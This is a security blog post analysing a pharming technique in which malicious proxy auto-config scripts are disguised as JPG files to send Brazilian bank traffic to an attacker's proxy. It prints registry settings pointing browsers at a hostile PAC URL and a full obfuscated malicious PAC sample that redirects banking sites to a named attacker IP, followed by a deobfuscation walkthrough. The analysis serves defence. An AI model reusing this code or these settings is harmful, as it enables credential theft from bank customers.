JPG Encrypted PAC - A new Favorite for Pharmers

Share Button

The MITM attack using PAC (Proxy Automatic Configuration) Files is a method of fraud widely used by Brazilian hackers in order to control the HTTP traffic of an infected machine and redirect it to a proxy owned by the delinquent.

Typically the PAC files are set in browsers to “instruct” the software about what proxy must be chosen to access a specific URL. These attacks are similar to “pharming” attacks where local host files or DNS redirect URLs to hostile IP addresses.PAC functionality is built into every web browser as a feature to allow internal IT organizations flexibility in redirecting clients to specific network egress proxies. Unfortunately, PAC has been adopted as a new favorite pharming technique primarily because this technique is harder to detect, and it offers hackers the same flexibility and configurability in their attacks.

 

The content of these kinds of files is text (which can be seen through any text editor) and it is used to define at least one JavaScript function, which is then recognized by the browser:

function FindProxyForURL(url, host)
if (shExpMatch(host, "www.gmail.com"))
{return "PROXY 192.168.1.102:80; DIRECT";

Hackers often use malware to modify the PAC feature within a target browser. This malware can either set the browser to read a PAC file online or read it from a local folder in the machine. These actions can be performed through the modification of values in the windows registry, such as:

HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: “AutoConfigURL = http://www.badsite.com/pacscript.pac
HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,AutoConfigURL = file://C:/WINDOWS/proxy.pac

Some antivirus engines started blocking these PAC URLs, so hackers have been continuously evolving in the way they configure attacks by adding encryption to their code.
In recent months a new PAC technique has emerged: a proxy configuration code embed into JPG files. JPG is of course a very common image format and one not widely scrutinized by antivirus technology.

These “images” are not formatted according to the JPEG specifications; instead, they contain the clear-text JavaScript code of a properly formatted PAC routine.
Here is one example of a PAC routine disguised as a JPG file:

function FindProxyForURL(url, host)
{mpqre0=0;mpqre1=1;mpqre2=2;mpqre3=3;mpqre4=4;mpqre5=5;mpqre6=6;
mpqre7=7;mpqre8=8;mpqre9=9;mpqrevazio=";mpqrep=".";oqmsr="P";wrhnq="R";
ghdcr="O";vcawf="X";bbsgje="Y";

feliznatal=mpqrevazio+mpqre1+mpqre9+mpqre9+mpqrep+mpqre1+mpqre9+
mpqre3+mpqrep+mpqre2+mpqre5+mpqre2+mpqrep+mpqre1+mpqre5+mpqre9;

mpqrea="a";mpqreb="b";mpqrec="c";mpqred="d";mpqree="e";mpqref="f";
mpqreg="g";mpqreh="h";mpqrei="i";mpqrej="j";mpqrek="k";mpqrel="l";
mpqrem="m";mpqren="n";mpqreo="o";mpqrepp="p";mpqreq="q";mpqrer="r";
mpqres="s";mpqret="t";mpqreu="u";mpqrev="v";mpqrew="w";mpqrex="x";
mpqrey="y";mpqrez="z";

if (shExpMatch(host, mpqreh+mpqres+mpqreb+mpqrec+mpqrea+mpqred+mpqrev+mpqrea+mpqren+
mpqrec+mpqree+mpqrep+mpqrec+mpqreo+mpqrem+mpqrep+mpqreb+mpqrer))
{return oqmsr+wrhnq+ghdcr+vcawf+bbsgje+feliznatal;}

if (shExpMatch(host, mpqrei+mpqret+mpqrea+mpqreu+mpqrep+mpqrec+mpqreo+mpqrem+mpqrep+
mpqreb+mpqrer)){return oqmsr+wrhnq+ghdcr+vcawf+bbsgje+feliznatal;}

In this case, the attack employs an additional layer of JavaScript obfuscation/encryption to further disguise the content and structure of the PAC attack. Once recognized, the code is easily decrypted. This code is examined below in sections.

In the yellow part we can find the encryption of the characters that are going to be used in the rest of the code.

Next, the variable “feliznatal” is defined and it will have the information about the proxy that is going to be used. After decryption, the value of “feliznatal” is: 199.193.252.159

The configuration itself is being done in the blue part where the variable set in the first sections are used. For instance:

if (shExpMatch(host, hsbcadvance.com.br))
{return PROXY 199.193.252.159;}

This JavaScript code is configuring the browser to redirect the http traffic to the proxy 199.193.252.159 when accessing the URL hsbcadvance.com.br

The hacker now has control over the proxy and will show a fake page that will ask for credentials. Victims will see the URL of the bank on the address bar and will not be aware of the redirection.

This technique has been leveraged by hackers in Latin America to maintain more control and flexibility over their attacks. Since this attack is new and relatively unknown to hosting providers, attackers exploit this fact to ensure that their malicious proxies stay active longer to attack more victims. As with many web-based attacks that emerge from Latin America, we expect to see more PAC attacks globally in 2014.

Related Posts

Customer Success Story: How Scanning the Dark Web Has Changed Elements Financial’s Security Scanning the dark web for stolen credentials isn’t necessarily on the radar of every financial institution – but it should be.
Account Takeover – What You Need to Know About This $7 Billion Scheme Account takeover (ATO) – it’s the ultimate goal of most fraud attacks, and already causes at least $6.5 billion to $7 billion USD in annual losses across multiple verticals.

Leave a Reply

Your email address will not be published. Required fields are marked *